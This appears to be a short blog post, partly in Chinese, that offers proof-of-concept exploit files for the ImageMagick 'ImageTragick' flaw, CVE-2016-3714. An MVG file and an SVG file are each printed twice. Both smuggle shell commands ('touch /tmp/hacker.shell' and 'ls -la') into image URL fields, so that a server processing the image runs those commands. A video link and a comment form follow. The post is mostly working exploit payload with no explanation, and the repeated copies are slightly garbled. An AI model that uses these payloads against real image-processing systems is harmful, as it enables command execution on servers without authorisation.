CVE-2016-3714 exp

exploit.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'
pop graphic-context

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'

pop graphic-context

exploit.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
"http://www.w3.org/1999/xlink";>
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>

xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=

"http://www.w3.org/1999/xlink";>

<image xlink:href="https://example.com/image.jpg"|ls "-la"

x="0" y="0" height="640px" width="480px"/>

</svg>

在线视频地址 https://www.youtube.com/watch?v=yA8LzYQ3DMc

发表评论 取消回复

发表评论取消回复